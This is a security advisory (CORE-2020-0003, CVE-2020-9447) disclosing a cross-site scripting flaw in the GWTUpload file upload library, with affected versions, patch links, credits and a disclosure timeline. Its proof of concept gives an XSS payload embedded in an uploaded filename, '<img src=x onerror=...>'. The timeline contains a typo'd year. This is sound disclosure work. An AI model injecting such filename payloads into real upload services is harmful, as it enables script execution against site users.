GWTUpload XSS in the File Upload Functionality

1. Advisory Information

Title: GWTUpload XSS in the file upload functionality
Advisory ID: CORE-2020-0003
Date published:  2020-03-04
Date of last update:  2020-03-04
Vendors contacted: Manuel Carrasco Moñino (https://github.com/manolo/gwtupload)
Release mode: Forced release

2. Vulnerability Information

Class: Failure to Preserve Web Page Structure ('Cross-site Scripting') | CWE-79
Impact: Code execution allow privilege escalation
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name:  CVE-2020-9447

3. Vulnerability Description

GWTUpload is a library for uploading files to web servers that features real-time updates on file size, bytes transferred, and other relevant information during upload. It was developed by Manuel Carrasco Moñino and is available on GitHub, the software development site used primarily for hosting source code and providing version control, issue tracking, and documentation capabilities. 

There is an XSS (cross-site scripting) vulnerability present in the file upload functionality. Someone can upload a file with a malicious filename, which contains JavaScript code, which would result in XSS. Cross-site scripting enables attackers to steal data, change the appearance of a website, and perform other malicious activities like phishing or drive-by hacking.

4. Vulnerable Packages

• gwtupload-project-1.0.3.
• potentially older versions of gwtupload

5. Vendor Information, Solutions, and Workarounds

No version has been released to fix the reported issue.

Patches have been developed which will sanitize the upload file:

• https://github.com/stumoss/gwtupload/commit/9164fd469a2d5ae82824d5407385eb6fd3fa3fe1  
• https://github.com/clearswift/gwtupload/commit/eca56a0869f0f88f0def55ea19de23bf990268ef

6. Credits

This vulnerability was discovered and researched by Alikhan Uzakov from the Application Security Team of Clearswift, A Fortra Company.

The publication of this advisory was coordinated by Pablo Zurro from the CoreLabs Advisories Team.

7. Technical Description / Proof of Concept Code

GWTUpload provides a functionality to upload files to web servers, showing a progress bar with real-time updates about the process (file size, bytes transferred, etc). It uses Ajax requests to ask the web server for the upload progress. It has two components written in Java: the server side with servlet and utility classes, and the client side that is compiled into Javascript using GWT. This functionality could be abused by an unauthenticated attacker to upload an arbitrary file,leading to the execution of malicious code.

This proof of concept demonstrates the vulnerability.

 

This vulnerability can be reproduced as follows:

1. Deploy the SingleUploadSample war file
2. Upload a file from a Linux system only, as Windows will not work due to filename character restrictions. , This file must contain JavaScript code. For example: a <img src=x onerror=alert("AppSec")>

8. Report Timeline

2019-11-12 – Contacted library creator on the via email. Unfortunately, no response was received.

2020-02-12 – Opened a GitHub issue.

2020-02-28 – Requested and received CVE from Mitre.

2020-03-04 – Sent fixes to GitHub project with patches. 

2020-03-05 – Library creator informed about the advisory publication.

202-03-16 – Advisory published.

9. References

• https://github.com/manolo/gwtupload
• https://github.com/manolo/gwtupload/issues/32

10. About CoreLabs

CoreLabs, the research center of Core Security, A Fortra Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at www.coresecurity.com/core-labs.  

11. About Core Security, A Fortra Company

Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at [email protected]

12. Disclaimer

The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/